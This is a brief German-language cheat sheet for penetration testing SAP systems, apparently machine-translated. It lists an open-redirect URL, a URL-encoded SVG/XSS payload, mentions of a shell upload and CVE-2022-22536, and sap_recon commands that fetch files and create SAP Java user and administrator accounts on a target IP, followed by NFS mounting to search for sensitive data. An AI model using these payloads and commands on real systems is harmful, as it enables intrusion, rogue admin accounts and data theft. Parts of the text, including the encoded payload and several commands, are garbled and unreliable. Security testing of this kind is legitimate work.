SAP Pentest Cheatsheet
1.0.0
Bismillah
Für die Durchführung des Pentest sollten Sie das SAP -System in Ihrem Netzwerk bereitstellen
https: // host/SAP/public/bc/icf/logoff? recirecturl = bösiciousurl
http: // host: port/startpage
http: // host: port/sap/public/info
http: // host: port/sap/public/info
Suchen Sie nach/sapirexthelp https: // localhost/sapirexthelp
https: // host/sapirexthelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3D%26%23%39%37%23%23%31 %30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%36%26%23%%78%36%%26%23%78%36%26%23%78%36 %33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%23%23%%36%65%23%23%78%37%34%23%23%78%32%65%26 %23%78%36%34%26%23%78%36%66%26%23%%36%64%26%23%%36%36%23%78%36%39%26%23%78%36%65%29%3e.asp
SAP Information System 1.0 Shell Upload
CVE-2022-22536 (ICMAD SAP)
SAP Recon-Schwachstellen (CVE-2020-6287, CVE-2020-6286)
https://github.com/chipik/sap_recon
Download der ZIP -Datei
Python recon.py -h 172.16.30.8 -f /1111.zip
Erstellen Sie den SAP Java -Benutzer
Python recon.py -h 172.16.30.8 -U
Erstellen Sie den SAP Java Administratorbenutzer
Python recon.py -h 172.16.30.8 -a
SSLSCAN
NFS-LS NFS: // HOST/MOUNT
mkdir mnt && mont
Viel Glück bei sensiblen Informationen suchen
Ich suche eine virtuelle SAP -Maschine oder einen Container, um eine pentest -Simulation durchzuführen. Wenn Sie Informationen haben, bitte bitte dm me @linkedin)
Das Teilen ist fürsorglich
"
